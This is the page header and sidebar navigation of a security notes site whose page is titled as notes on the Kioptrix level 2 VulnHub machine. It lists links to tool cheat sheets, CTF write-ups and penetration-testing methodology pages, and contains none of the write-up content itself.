<!doctype html><html lang=en class="js csstransforms3d">
<head>
<meta charset=utf-8>
<meta name=viewport content="width=device-width,initial-scale=1">
<meta name=generator content="Hugo 0.93.0">
<meta name=description content="Notes from Kioptrix level 2 from Vulnhub.">
<meta name=author content="Justin Perdok">
<link rel=icon href=/images/favicon.png type=image/png>
<title>Level 2 :: My notes and snippets</title><link href=/css/nucleus.css rel=stylesheet>
<link href=/css/fontawesome-all.min.css rel=stylesheet>
<link href=/css/hybrid.css rel=stylesheet>
<link href=/css/featherlight.min.css rel=stylesheet>
<link href=/css/perfect-scrollbar.min.css rel=stylesheet>
<link href=/css/auto-complete.css rel=stylesheet>
<link href=/css/atom-one-dark-reasonable.css rel=stylesheet>
<link href=/css/theme.css rel=stylesheet>
<link href=/css/hugo-theme.css rel=stylesheet>
<link href=/css/theme-darkblue.css rel=stylesheet>
<script src=/js/jquery-3.3.1.min.js></script>
<style>:root #header+#content>#left>#rlblock_left{display:none!important}</style></head><body data-url=/notes/ctfs/vulnhub/kioptrix/level2/>
<nav id=sidebar>
<div id=header-wrapper>
<div id=header>
<a id=logo href=https://notes.justin-p.me/>
</a>
</div><div class=searchbox>
<label for=search-by><i class="fas fa-search"></i></label>
<input data-search-input id=search-by type=search placeholder=Search...>
<span data-search-clear><i class="fas fa-times"></i></span>
</div><script type=text/javascript src=/js/lunr.min.js></script>
<script type=text/javascript src=/js/auto-complete.js></script>
<script type=text/javascript>var baseurl="https://notes.justin-p.me/"</script>
<script type=text/javascript src=/js/search.js></script>
</div><div class=highlightable>
<ul class=topics>
<li data-nav-id=/cheatsheets/ title="Cheat Sheets" class=dd-item>
<a href=/cheatsheets/>
<i class="fas fa-keyboard"></i> Cheat Sheets
</a>
<ul>
<li data-nav-id=/cheatsheets/programming/ title=Programming class=dd-item>
<a href=/cheatsheets/programming/>
<i class="fas fa-code"></i> Programming
</a>
<ul>
<li data-nav-id=/cheatsheets/programming/bash/ title=Bash class=dd-item>
<a href=/cheatsheets/programming/bash/>
<i class="fas fa-layer-group"></i> Bash
</a>
</li><li data-nav-id=/cheatsheets/programming/docker-compose/ title=docker-compose class=dd-item>
<a href=/cheatsheets/programming/docker-compose/>
<i class="fas fa-layer-group"></i> docker-compose
</a>
</li><li data-nav-id=/cheatsheets/programming/dockerfile/ title=Dockerfile class=dd-item>
<a href=/cheatsheets/programming/dockerfile/>
<i class="fas fa-layer-group"></i> Dockerfile
</a>
</li><li data-nav-id=/cheatsheets/programming/markdown/ title=Markdown class=dd-item>
<a href=/cheatsheets/programming/markdown/>
<i class="fas fa-layer-group"></i> Markdown
</a>
</li><li data-nav-id=/cheatsheets/programming/mysql/ title=MySQL class=dd-item>
<a href=/cheatsheets/programming/mysql/>
<i class="fas fa-layer-group"></i> MySQL
</a>
</li><li data-nav-id=/cheatsheets/programming/php/ title=PHP class=dd-item>
<a href=/cheatsheets/programming/php/>
<i class="fas fa-layer-group"></i> PHP
</a>
</li><li data-nav-id=/cheatsheets/programming/powershell/ title=PowerShell class=dd-item>
<a href=/cheatsheets/programming/powershell/>
<i class="fas fa-layer-group"></i> PowerShell
</a>
</li><li data-nav-id=/cheatsheets/programming/python/ title=Python class=dd-item>
<a href=/cheatsheets/programming/python/>
<i class="fas fa-layer-group"></i> Python
</a>
</li></ul></li><li data-nav-id=/cheatsheets/tools/ title=Tools class=dd-item>
<a href=/cheatsheets/tools/>
<i class="fas fa-tools"></i> Tools
</a>
<ul>
<li data-nav-id=/cheatsheets/tools/amsitrigger/ title=AMSITrigger class=dd-item>
<a href=/cheatsheets/tools/amsitrigger/>
<i class="fas fa-wrench"></i> AMSITrigger
</a>
</li><li data-nav-id=/cheatsheets/tools/aria2/ title=aria2 class=dd-item>
<a href=/cheatsheets/tools/aria2/>
<i class="fas fa-wrench"></i> aria2
</a>
</li><li data-nav-id=/cheatsheets/tools/bettercap/ title=bettercap class=dd-item>
<a href=/cheatsheets/tools/bettercap/>
<i class="fas fa-wrench"></i> bettercap
</a>
</li><li data-nav-id=/cheatsheets/tools/binwalk/ title=binwalk class=dd-item>
<a href=/cheatsheets/tools/binwalk/>
<i class="fas fa-wrench"></i> binwalk
</a>
</li><li data-nav-id=/cheatsheets/tools/chisel/ title=chisel class=dd-item>
<a href=/cheatsheets/tools/chisel/>
<i class="fas fa-wrench"></i> chisel
</a>
</li><li data-nav-id=/cheatsheets/tools/ciphey/ title=ciphey class=dd-item>
<a href=/cheatsheets/tools/ciphey/>
<i class="fas fa-wrench"></i> ciphey
</a>
</li><li data-nav-id=/cheatsheets/tools/docker/ title=docker class=dd-item>
<a href=/cheatsheets/tools/docker/>
<i class="fas fa-wrench"></i> docker
</a>
</li><li data-nav-id=/cheatsheets/tools/docker-compose/ title=docker-compose class=dd-item>
<a href=/cheatsheets/tools/docker-compose/>
<i class="fas fa-wrench"></i> docker-compose
</a>
</li><li data-nav-id=/cheatsheets/tools/empire/ title=Empire class=dd-item>
<a href=/cheatsheets/tools/empire/>
<i class="fas fa-wrench"></i> Empire
</a>
</li><li data-nav-id=/cheatsheets/tools/exiftool/ title=exiftool class=dd-item>
<a href=/cheatsheets/tools/exiftool/>
<i class="fas fa-wrench"></i> exiftool
</a>
</li><li data-nav-id=/cheatsheets/tools/foremost/ title=foremost class=dd-item>
<a href=/cheatsheets/tools/foremost/>
<i class="fas fa-wrench"></i> foremost
</a>
</li><li data-nav-id=/cheatsheets/tools/h8mail/ title=h8mail class=dd-item>
<a href=/cheatsheets/tools/h8mail/>
<i class="fas fa-wrench"></i> h8mail
</a>
</li><li data-nav-id=/cheatsheets/tools/hashcat/ title=hashcat class=dd-item>
<a href=/cheatsheets/tools/hashcat/>
<i class="fas fa-wrench"></i> hashcat
</a>
</li><li data-nav-id=/cheatsheets/tools/hcxtools/ title=hcxtools class=dd-item>
<a href=/cheatsheets/tools/hcxtools/>
<i class="fas fa-wrench"></i> hcxtools
</a>
</li><li data-nav-id=/cheatsheets/tools/hugo/ title=hugo class=dd-item>
<a href=/cheatsheets/tools/hugo/>
<i class="fas fa-wrench"></i> hugo
</a>
</li><li data-nav-id=/cheatsheets/tools/hydra/ title=Hydra class=dd-item>
<a href=/cheatsheets/tools/hydra/>
<i class="fas fa-wrench"></i> Hydra
</a>
</li><li data-nav-id=/cheatsheets/tools/metasploit/ title=Metasploit class=dd-item>
<a href=/cheatsheets/tools/metasploit/>
<i class="fas fa-wrench"></i> Metasploit
</a>
</li><li data-nav-id=/cheatsheets/tools/mitm6/ title=mitm6 class=dd-item>
<a href=/cheatsheets/tools/mitm6/>
<i class="fas fa-wrench"></i> mitm6
</a>
</li><li data-nav-id=/cheatsheets/tools/msfvenom/ title=msfvenom class=dd-item>
<a href=/cheatsheets/tools/msfvenom/>
<i class="fas fa-wrench"></i> msfvenom
</a>
</li><li data-nav-id=/cheatsheets/tools/name-that-hash/ title=Name-That-Hash class=dd-item>
<a href=/cheatsheets/tools/name-that-hash/>
<i class="fas fa-wrench"></i> Name-That-Hash
</a>
</li><li data-nav-id=/cheatsheets/tools/ncat/ title=ncat class=dd-item>
<a href=/cheatsheets/tools/ncat/>
<i class="fas fa-wrench"></i> ncat
</a>
</li><li data-nav-id=/cheatsheets/tools/nmap/ title=Nmap class=dd-item>
<a href=/cheatsheets/tools/nmap/>
<i class="fas fa-wrench"></i> Nmap
</a>
</li><li data-nav-id=/cheatsheets/tools/ntlmrelayx/ title=ntlmrelayx class=dd-item>
<a href=/cheatsheets/tools/ntlmrelayx/>
<i class="fas fa-wrench"></i> ntlmrelayx
</a>
</li><li data-nav-id=/cheatsheets/tools/openssl/ title=openssl class=dd-item>
<a href=/cheatsheets/tools/openssl/>
<i class="fas fa-wrench"></i> openssl
</a>
<ul>
<li data-nav-id=/cheatsheets/tools/openssl/s_client/ title=s_client class=dd-item>
<a href=/cheatsheets/tools/openssl/s_client/>
<i class="fas fa-wrench"></i> s_client
</a>
</li></ul></li><li data-nav-id=/cheatsheets/tools/psdnsdumpsterapi/ title=PSDNSDumpsterAPI class=dd-item>
<a href=/cheatsheets/tools/psdnsdumpsterapi/>
<i class="fas fa-wrench"></i> PSDNSDumpsterAPI
</a>
</li><li data-nav-id=/cheatsheets/tools/psexec/ title=psexec class=dd-item>
<a href=/cheatsheets/tools/psexec/>
<i class="fas fa-wrench"></i> psexec
</a>
</li><li data-nav-id=/cheatsheets/tools/rdesktop/ title=Rdesktop class=dd-item>
<a href=/cheatsheets/tools/rdesktop/>
<i class="fas fa-wrench"></i> Rdesktop
</a>
</li><li data-nav-id=/cheatsheets/tools/responder/ title=responder class=dd-item>
<a href=/cheatsheets/tools/responder/>
<i class="fas fa-wrench"></i> responder
</a>
</li><li data-nav-id=/cheatsheets/tools/search-that-hash/ title=Search-That-Hash class=dd-item>
<a href=/cheatsheets/tools/search-that-hash/>
<i class="fas fa-wrench"></i> Search-That-Hash
</a>
</li><li data-nav-id=/cheatsheets/tools/searchsploit/ title=searchsploit class=dd-item>
<a href=/cheatsheets/tools/searchsploit/>
<i class="fas fa-wrench"></i> searchsploit
</a>
</li><li data-nav-id=/cheatsheets/tools/smbclient/ title=smb class=dd-item>
<a href=/cheatsheets/tools/smbclient/>
<i class="fas fa-wrench"></i> smb
</a>
</li><li data-nav-id=/cheatsheets/tools/steghide/ title=steghide class=dd-item>
<a href=/cheatsheets/tools/steghide/>
<i class="fas fa-wrench"></i> steghide
</a>
</li><li data-nav-id=/cheatsheets/tools/sublist3r/ title=sublist3r class=dd-item>
<a href=/cheatsheets/tools/sublist3r/>
<i class="fas fa-wrench"></i> sublist3r
</a>
</li><li data-nav-id=/cheatsheets/tools/theharvester/ title=theHarvester class=dd-item>
<a href=/cheatsheets/tools/theharvester/>
<i class="fas fa-wrench"></i> theHarvester
</a>
</li><li data-nav-id=/cheatsheets/tools/threatcheck/ title=ThreatCheck class=dd-item>
<a href=/cheatsheets/tools/threatcheck/>
<i class="fas fa-wrench"></i> ThreatCheck
</a>
</li><li data-nav-id=/cheatsheets/tools/usbrip/ title=usbrip class=dd-item>
<a href=/cheatsheets/tools/usbrip/>
<i class="fas fa-wrench"></i> usbrip
</a>
</li><li data-nav-id=/cheatsheets/tools/whatweb/ title=whatweb class=dd-item>
<a href=/cheatsheets/tools/whatweb/>
<i class="fas fa-wrench"></i> whatweb
</a>
</li></ul></li><li data-nav-id=/cheatsheets/unix/ title=Unix class=dd-item>
<a href=/cheatsheets/unix/>
<i class="fab fa-linux"></i> Unix
</a>
<ul>
<li data-nav-id=/cheatsheets/unix/apt/ title=apt class=dd-item>
<a href=/cheatsheets/unix/apt/>
<i class="fas fa-terminal"></i> apt
</a>
</li><li data-nav-id=/cheatsheets/unix/awk/ title=awk class=dd-item>
<a href=/cheatsheets/unix/awk/>
<i class="fas fa-terminal"></i> awk
</a>
</li><li data-nav-id=/cheatsheets/unix/base64/ title=base64 class=dd-item>
<a href=/cheatsheets/unix/base64/>
<i class="fas fa-terminal"></i> base64
</a>
</li><li data-nav-id=/cheatsheets/unix/bzip2/ title=bzip2 class=dd-item>
<a href=/cheatsheets/unix/bzip2/>
<i class="fas fa-terminal"></i> bzip2
</a>
</li><li data-nav-id=/cheatsheets/unix/chmod/ title=chmod class=dd-item>
<a href=/cheatsheets/unix/chmod/>
<i class="fas fa-terminal"></i> chmod
</a>
</li><li data-nav-id=/cheatsheets/unix/cron/ title=cron class=dd-item>
<a href=/cheatsheets/unix/cron/>
<i class="fas fa-terminal"></i> cron
</a>
</li><li data-nav-id=/cheatsheets/unix/curl/ title=curl class=dd-item>
<a href=/cheatsheets/unix/curl/>
<i class="fas fa-terminal"></i> curl
</a>
</li><li data-nav-id=/cheatsheets/unix/cut/ title=cut class=dd-item>
<a href=/cheatsheets/unix/cut/>
<i class="fas fa-terminal"></i> cut
</a>
</li><li data-nav-id=/cheatsheets/unix/dig/ title=dig class=dd-item>
<a href=/cheatsheets/unix/dig/>
<i class="fas fa-terminal"></i> dig
</a>
</li><li data-nav-id=/cheatsheets/unix/file/ title=file class=dd-item>
<a href=/cheatsheets/unix/file/>
<i class="fas fa-terminal"></i> file
</a>
</li><li data-nav-id=/cheatsheets/unix/find/ title=find class=dd-item>
<a href=/cheatsheets/unix/find/>
<i class="fas fa-terminal"></i> find
</a>
</li><li data-nav-id=/cheatsheets/unix/ftp/ title=ftp class=dd-item>
<a href=/cheatsheets/unix/ftp/>
<i class="fas fa-terminal"></i> ftp
</a>
</li><li data-nav-id=/cheatsheets/unix/gpg/ title=gpg class=dd-item>
<a href=/cheatsheets/unix/gpg/>
<i class="fas fa-terminal"></i> gpg
</a>
</li><li data-nav-id=/cheatsheets/unix/grep/ title=grep class=dd-item>
<a href=/cheatsheets/unix/grep/>
<i class="fas fa-terminal"></i> grep
</a>
</li><li data-nav-id=/cheatsheets/unix/gzip-gunzip-zcat/ title="gzip gunzip zcat" class=dd-item>
<a href=/cheatsheets/unix/gzip-gunzip-zcat/>
<i class="fas fa-terminal"></i> gzip gunzip zcat
</a>
</li><li data-nav-id=/cheatsheets/unix/md5sum/ title=md5sum class=dd-item>
<a href=/cheatsheets/unix/md5sum/>
<i class="fas fa-terminal"></i> md5sum
</a>
</li><li data-nav-id=/cheatsheets/unix/ntp/ title=ntp class=dd-item>
<a href=/cheatsheets/unix/ntp/>
<i class="fas fa-terminal"></i> ntp
</a>
</li><li data-nav-id=/cheatsheets/unix/rev/ title=rev class=dd-item>
<a href=/cheatsheets/unix/rev/>
<i class="fas fa-terminal"></i> rev
</a>
</li><li data-nav-id=/cheatsheets/unix/scp/ title=scp class=dd-item>
<a href=/cheatsheets/unix/scp/>
<i class="fas fa-terminal"></i> scp
</a>
</li><li data-nav-id=/cheatsheets/unix/sed/ title=sed class=dd-item>
<a href=/cheatsheets/unix/sed/>
<i class="fas fa-terminal"></i> sed
</a>
</li><li data-nav-id=/cheatsheets/unix/showmount/ title=showmount class=dd-item>
<a href=/cheatsheets/unix/showmount/>
<i class="fas fa-terminal"></i> showmount
</a>
</li><li data-nav-id=/cheatsheets/unix/sort/ title=sort class=dd-item>
<a href=/cheatsheets/unix/sort/>
<i class="fas fa-terminal"></i> sort
</a>
</li><li data-nav-id=/cheatsheets/unix/strings/ title=strings class=dd-item>
<a href=/cheatsheets/unix/strings/>
<i class="fas fa-terminal"></i> strings
</a>
</li><li data-nav-id=/cheatsheets/unix/tar/ title=tar class=dd-item>
<a href=/cheatsheets/unix/tar/>
<i class="fas fa-terminal"></i> tar
</a>
</li><li data-nav-id=/cheatsheets/unix/tmux/ title=tmux class=dd-item>
<a href=/cheatsheets/unix/tmux/>
<i class="fas fa-terminal"></i> tmux
</a>
</li><li data-nav-id=/cheatsheets/unix/touch/ title=touch class=dd-item>
<a href=/cheatsheets/unix/touch/>
<i class="fas fa-terminal"></i> touch
</a>
</li><li data-nav-id=/cheatsheets/unix/tr/ title=tr class=dd-item>
<a href=/cheatsheets/unix/tr/>
<i class="fas fa-terminal"></i> tr
</a>
</li><li data-nav-id=/cheatsheets/unix/uniq/ title=uniq class=dd-item>
<a href=/cheatsheets/unix/uniq/>
<i class="fas fa-terminal"></i> uniq
</a>
</li><li data-nav-id=/cheatsheets/unix/watch/ title=watch class=dd-item>
<a href=/cheatsheets/unix/watch/>
<i class="fas fa-terminal"></i> watch
</a>
</li><li data-nav-id=/cheatsheets/unix/wc/ title=wc class=dd-item>
<a href=/cheatsheets/unix/wc/>
<i class="fas fa-terminal"></i> wc
</a>
</li><li data-nav-id=/cheatsheets/unix/xxd/ title=xxd class=dd-item>
<a href=/cheatsheets/unix/xxd/>
<i class="fas fa-terminal"></i> xxd
</a>
</li></ul></li><li data-nav-id=/cheatsheets/windows/ title=Windows class=dd-item>
<a href=/cheatsheets/windows/>
<i class="fas fa-terminal"></i> Windows
</a>
<ul>
<li data-nav-id=/cheatsheets/windows/net/ title=NET class=dd-item>
<a href=/cheatsheets/windows/net/>
<i class="fas fa-terminal"></i> NET
</a>
</li><li data-nav-id=/cheatsheets/windows/runas/ title=runas class=dd-item>
<a href=/cheatsheets/windows/runas/>
<i class="fas fa-terminal"></i> runas
</a>
</li></ul></li></ul></li><li data-nav-id=/guides/ title=Guides class=dd-item>
<a href=/guides/>
<i class="fas fa-arrow-alt-circle-right"></i> Guides
</a>
<ul>
<li data-nav-id=/guides/printnightmare/ title=printnightmare class=dd-item>
<a href=/guides/printnightmare/>
printnightmare
</a>
</li><li data-nav-id=/guides/ubuntu-vps/ title="Ubuntu VPS" class=dd-item>
<a href=/guides/ubuntu-vps/>
<i class="fab fa-ubuntu"></i> Ubuntu VPS
</a>
<ul>
<li data-nav-id=/guides/ubuntu-vps/00-intro/ title="00. Introduction" class=dd-item>
<a href=/guides/ubuntu-vps/00-intro/>
00. Introduction
</a>
</li><li data-nav-id=/guides/ubuntu-vps/01-users/ title="01. Adding users" class=dd-item>
<a href=/guides/ubuntu-vps/01-users/>
01. Adding users
</a>
</li><li data-nav-id=/guides/ubuntu-vps/02-packges/ title="02. Managing of packages" class=dd-item>
<a href=/guides/ubuntu-vps/02-packges/>
02. Managing of packages
</a>
</li><li data-nav-id=/guides/ubuntu-vps/03-vim/ title="03. File editor: vim" class=dd-item>
<a href=/guides/ubuntu-vps/03-vim/>
03. File editor: vim
</a>
</li><li data-nav-id=/guides/ubuntu-vps/04-ufw/ title="04. UFW" class=dd-item>
<a href=/guides/ubuntu-vps/04-ufw/>
04. UFW
</a>
</li><li data-nav-id=/guides/ubuntu-vps/05-ssh-keys/ title="05. SSH Keys" class=dd-item>
<a href=/guides/ubuntu-vps/05-ssh-keys/>
05. SSH Keys
</a>
</li><li data-nav-id=/guides/ubuntu-vps/06-setup-sshd/ title="06. Setup sshd" class=dd-item>
<a href=/guides/ubuntu-vps/06-setup-sshd/>
06. Setup sshd
</a>
</li><li data-nav-id=/guides/ubuntu-vps/07-unattended-upgrades/ title="07. Unattended Upgrades" class=dd-item>
<a href=/guides/ubuntu-vps/07-unattended-upgrades/>
07. Unattended Upgrades
</a>
</li><li data-nav-id=/guides/ubuntu-vps/08-fail2ban/ title="08. Fail2ban" class=dd-item>
<a href=/guides/ubuntu-vps/08-fail2ban/>
08. Fail2ban
</a>
</li><li data-nav-id=/guides/ubuntu-vps/09-logwatch/ title="09. Logwatch" class=dd-item>
<a href=/guides/ubuntu-vps/09-logwatch/>
09. Logwatch
</a>
</li><li data-nav-id=/guides/ubuntu-vps/10-sysctl-optimization/ title="10. Sysctl Optimization" class=dd-item>
<a href=/guides/ubuntu-vps/10-sysctl-optimization/>
10. Sysctl Optimization
</a>
</li></ul></li></ul></li><li data-nav-id=/notes/ title=Notes class="dd-item
parent">
<a href=/notes/>
<i class="fas fa-book-reader"></i> Notes
</a>
<ul>
<li data-nav-id=/notes/courses/ title=Courses class=dd-item>
<a href=/notes/courses/>
<i class="fas fa-school"></i> Courses
</a>
<ul>
<li data-nav-id=/notes/courses/blackhat-python/ title="Blackhat Python" class=dd-item>
<a href=/notes/courses/blackhat-python/>
<i class="fas fa-folder"></i> Blackhat Python
</a>
</li><li data-nav-id=/notes/courses/breaching-the-cloud/ title="Breaching The Cloud" class=dd-item>
<a href=/notes/courses/breaching-the-cloud/>
<i class="fas fa-folder"></i> Breaching The Cloud
</a>
</li><li data-nav-id=/notes/courses/python4n00bs/ title=Python4N00bs class=dd-item>
<a href=/notes/courses/python4n00bs/>
<i class="fas fa-folder"></i> Python4N00bs
</a>
</li><li data-nav-id=/notes/courses/the-cyber-mentor/ title="The Cyber Mentor" class=dd-item>
<a href=/notes/courses/the-cyber-mentor/>
<i class="fas fa-folder"></i> The Cyber Mentor
</a>
</li></ul></li><li data-nav-id=/notes/ctfs/ title=CTFs class="dd-item
parent">
<a href=/notes/ctfs/>
<i class="fas fa-flag"></i> CTFs
</a>
<ul>
<li data-nav-id=/notes/ctfs/graficomspoorzoeker/ title="Graficom Spoorzoeker" class=dd-item>
<a href=/notes/ctfs/graficomspoorzoeker/>
<i class="fas fa-folder"></i> Graficom Spoorzoeker
</a>
<ul>
<li data-nav-id=/notes/ctfs/graficomspoorzoeker/challanges/ title=Challanges class=dd-item>
<a href=/notes/ctfs/graficomspoorzoeker/challanges/>
<i class="fas fa-question-circle"></i> Challanges
</a>
</li><li data-nav-id=/notes/ctfs/graficomspoorzoeker/solutions/ title=Solutions class=dd-item>
<a href=/notes/ctfs/graficomspoorzoeker/solutions/>
<i class="fas fa-check-circle"></i> Solutions
</a>
</li></ul></li><li data-nav-id=/notes/ctfs/htb/ title=HTB class=dd-item>
<a href=/notes/ctfs/htb/>
<i class="fas fa-folder"></i> HTB
</a>
<ul>
<li data-nav-id=/notes/ctfs/htb/bashed/ title=Bashed class=dd-item>
<a href=/notes/ctfs/htb/bashed/>
<i class="fas fa-server"></i> Bashed
</a>
</li><li data-nav-id=/notes/ctfs/htb/blue/ title=Blue class=dd-item>
<a href=/notes/ctfs/htb/blue/>
<i class="fas fa-server"></i> Blue
</a>
</li><li data-nav-id=/notes/ctfs/htb/devel/ title=Devel class=dd-item>
<a href=/notes/ctfs/htb/devel/>
<i class="fas fa-server"></i> Devel
</a>
</li><li data-nav-id=/notes/ctfs/htb/grandpa/ title=Grandpa class=dd-item>
<a href=/notes/ctfs/htb/grandpa/>
<i class="fas fa-server"></i> Grandpa
</a>
</li><li data-nav-id=/notes/ctfs/htb/granny/ title=Granny class=dd-item>
<a href=/notes/ctfs/htb/granny/>
<i class="fas fa-server"></i> Granny
</a>
</li><li data-nav-id=/notes/ctfs/htb/jerry/ title=Jerry class=dd-item>
<a href=/notes/ctfs/htb/jerry/>
<i class="fas fa-server"></i> Jerry
</a>
</li><li data-nav-id=/notes/ctfs/htb/lame/ title=Lame class=dd-item>
<a href=/notes/ctfs/htb/lame/>
<i class="fas fa-server"></i> Lame
</a>
</li><li data-nav-id=/notes/ctfs/htb/legacy/ title=Legacy class=dd-item>
<a href=/notes/ctfs/htb/legacy/>
<i class="fas fa-server"></i> Legacy
</a>
</li><li data-nav-id=/notes/ctfs/htb/metmon/ title=Netmon class=dd-item>
<a href=/notes/ctfs/htb/metmon/>
<i class="fas fa-server"></i> Netmon
</a>
</li><li data-nav-id=/notes/ctfs/htb/nibbles/ title=Nibbles class=dd-item>
<a href=/notes/ctfs/htb/nibbles/>
<i class="fas fa-server"></i> Nibbles
</a>
</li><li data-nav-id=/notes/ctfs/htb/optimum/ title=Optimum class=dd-item>
<a href=/notes/ctfs/htb/optimum/>
<i class="fas fa-server"></i> Optimum
</a>
</li></ul></li><li data-nav-id=/notes/ctfs/overthewire/ title=OverTheWire class=dd-item>
<a href=/notes/ctfs/overthewire/>
<i class="fas fa-folder"></i> OverTheWire
</a>
<ul>
<li data-nav-id=/notes/ctfs/overthewire/bandit/ title=Bandit class=dd-item>
<a href=/notes/ctfs/overthewire/bandit/>
<i class="fas fa-layer-group"></i> Bandit
</a>
</li><li data-nav-id=/notes/ctfs/overthewire/natasa/ title=Natasa class=dd-item>
<a href=/notes/ctfs/overthewire/natasa/>
<i class="fas fa-layer-group"></i> Natasa
</a>
</li></ul></li><li data-nav-id=/notes/ctfs/underthewire/ title=underthewire class=dd-item>
<a href=/notes/ctfs/underthewire/>
<i class="fas fa-folder"></i> underthewire
</a>
<ul>
<li data-nav-id=/notes/ctfs/underthewire/century/ title=century class=dd-item>
<a href=/notes/ctfs/underthewire/century/>
<i class="fas fa-folder"></i> century
</a>
</li><li data-nav-id=/notes/ctfs/underthewire/cyborg/ title=cyborg class=dd-item>
<a href=/notes/ctfs/underthewire/cyborg/>
<i class="fas fa-folder"></i> cyborg
</a>
</li></ul></li><li data-nav-id=/notes/ctfs/vulnhub/ title=VulnHub class="dd-item
parent">
<a href=/notes/ctfs/vulnhub/>
<i class="fas fa-folder"></i> VulnHub
</a>
<ul>
<li data-nav-id=/notes/ctfs/vulnhub/fristileaks/ title=Fristileaks class=dd-item>
<a href=/notes/ctfs/vulnhub/fristileaks/>
<i class="fas fa-folder"></i> Fristileaks
</a>
</li><li data-nav-id=/notes/ctfs/vulnhub/kioptrix/ title=Kioptrix class="dd-item
parent">
<a href=/notes/ctfs/vulnhub/kioptrix/>
<i class="fas fa-folder"></i> Kioptrix
</a>
<ul>
<li data-nav-id=/notes/ctfs/vulnhub/kioptrix/level1/ title="Level 1" class=dd-item>
<a href=/notes/ctfs/vulnhub/kioptrix/level1/>
<i class="fas fa-layer-group"></i> Level 1
</a>
</li><li data-nav-id=/notes/ctfs/vulnhub/kioptrix/level2/ title="Level 2" class="dd-item active">
<a href=/notes/ctfs/vulnhub/kioptrix/level2/>
<i class="fas fa-layer-group"></i> Level 2
</a>
</li><li data-nav-id=/notes/ctfs/vulnhub/kioptrix/level3/ title="Level 3" class=dd-item>
<a href=/notes/ctfs/vulnhub/kioptrix/level3/>
<i class="fas fa-layer-group"></i> Level 3
</a>
</li><li data-nav-id=/notes/ctfs/vulnhub/kioptrix/level4/ title="Level 4" class=dd-item>
<a href=/notes/ctfs/vulnhub/kioptrix/level4/>
<i class="fas fa-layer-group"></i> Level 4
</a>
</li></ul></li><li data-nav-id=/notes/ctfs/vulnhub/pwnlab/ title=Pwnlab class=dd-item>
<a href=/notes/ctfs/vulnhub/pwnlab/>
<i class="fas fa-folder"></i> Pwnlab
</a>
</li><li data-nav-id=/notes/ctfs/vulnhub/stapler/ title=Stapler class=dd-item>
<a href=/notes/ctfs/vulnhub/stapler/>
<i class="fas fa-folder"></i> Stapler
</a>
</li><li data-nav-id=/notes/ctfs/vulnhub/vulnix/ title=Vulnix class=dd-item>
<a href=/notes/ctfs/vulnhub/vulnix/>
<i class="fas fa-folder"></i> Vulnix
</a>
</li></ul></li><li data-nav-id=/notes/ctfs/vulnserver/ title=Vulnserver class=dd-item>
<a href=/notes/ctfs/vulnserver/>
<i class="fas fa-folder"></i> Vulnserver
</a>
<ul>
<li data-nav-id=/notes/ctfs/vulnserver/trun/ title=TRUN class=dd-item>
<a href=/notes/ctfs/vulnserver/trun/>
<i class="fas fa-layer-group"></i> TRUN
</a>
</li></ul></li></ul></li><li data-nav-id=/notes/methodology/ title="Hacking Methodology" class=dd-item>
<a href=/notes/methodology/>
<i class="fas fa-road"></i> Hacking Methodology
</a>
<ul>
<li data-nav-id=/notes/methodology/external/ title=External class=dd-item>
<a href=/notes/methodology/external/>
External
</a>
<ul>
<li data-nav-id=/notes/methodology/external/misconfigured-cloud-assets/ title="Misconfigured Cloud Assets" class=dd-item>
<a href=/notes/methodology/external/misconfigured-cloud-assets/>
Misconfigured Cloud Assets
</a>
</li><li data-nav-id=/notes/methodology/external/phising/ title=Phising class=dd-item>
<a href=/notes/methodology/external/phising/>
Phising
</a>
</li><li data-nav-id=/notes/methodology/external/postexploit/ title="Post Exploit" class=dd-item>
<a href=/notes/methodology/external/postexploit/>
Post Exploit
</a>
<ul>
<li data-nav-id=/notes/methodology/external/postexploit/cloud-provider-web-servers/ title=cloud-provider-web-servers class=dd-item>
<a href=/notes/methodology/external/postexploit/cloud-provider-web-servers/>
cloud-provider-web-servers
</a>
</li><li data-nav-id=/notes/methodology/external/postexploit/rdp/ title=rdp class=dd-item>
<a href=/notes/methodology/external/postexploit/rdp/>
rdp
</a>
</li><li data-nav-id=/notes/methodology/external/postexploit/remoteuac/ title="Remote UAC" class=dd-item>
<a href=/notes/methodology/external/postexploit/remoteuac/>
Remote UAC
</a>
</li></ul></li><li data-nav-id=/notes/methodology/external/recon/ title=recon class=dd-item>
<a href=/notes/methodology/external/recon/>
recon
</a>
<ul>
<li data-nav-id=/notes/methodology/external/recon/certificate-transparency-logs/ title="Certificate Transparency Logs" class=dd-item>
<a href=/notes/methodology/external/recon/certificate-transparency-logs/>
Certificate Transparency Logs
</a>
</li><li data-nav-id=/notes/methodology/external/recon/credential-gathering/ title="Credential Gathering" class=dd-item>
<a href=/notes/methodology/external/recon/credential-gathering/>
Credential Gathering
</a>
</li><li data-nav-id=/notes/methodology/external/recon/dns-recon/ title="DNS Recon" class=dd-item>
<a href=/notes/methodology/external/recon/dns-recon/>
DNS Recon
</a>
</li><li data-nav-id=/notes/methodology/external/recon/user-enumeration/ title="E-Mail Gathering" class=dd-item>
<a href=/notes/methodology/external/recon/user-enumeration/>
E-Mail Gathering
</a>
</li><li data-nav-id=/notes/methodology/external/recon/google-dorking/ title="Google Dorking" class=dd-item>
<a href=/notes/methodology/external/recon/google-dorking/>
Google Dorking
</a>
</li><li data-nav-id=/notes/methodology/external/recon/identify-technologies/ title="Identify Technologies" class=dd-item>
<a href=/notes/methodology/external/recon/identify-technologies/>
Identify Technologies
</a>
</li><li data-nav-id=/notes/methodology/external/recon/public-key-disclosure/ title="public key disclosure" class=dd-item>
<a href=/notes/methodology/external/recon/public-key-disclosure/>
public key disclosure
</a>
</li><li data-nav-id=/notes/methodology/external/recon/shodan/ title=Shodan class=dd-item>
<a href=/notes/methodology/external/recon/shodan/>
Shodan
</a>
</li></ul></li></ul></li><li data-nav-id=/notes/methodology/general/ title=General class=dd-item>
<a href=/notes/methodology/general/>
General
</a>
<ul>
<li data-nav-id=/notes/methodology/general/avbypass/ title="AV Bypass" class=dd-item>
<a href=/notes/methodology/general/avbypass/>
AV Bypass
</a>
<ul>
<li data-nav-id=/notes/methodology/general/avbypass/malwaretestvm/ title="Malware Test VM" class=dd-item>
<a href=/notes/methodology/general/avbypass/malwaretestvm/>
Malware Test VM
</a>
</li></ul></li><li data-nav-id=/notes/methodology/general/buffer-overflow/ title="Buffer Overflow" class=dd-item>
<a href=/notes/methodology/general/buffer-overflow/>
<i class="fas fa-layer-group"></i> Buffer Overflow
</a>
</li><li data-nav-id=/notes/methodology/general/port-scanning/ title="Discover Open Ports" class=dd-item>
<a href=/notes/methodology/general/port-scanning/>
Discover Open Ports
</a>
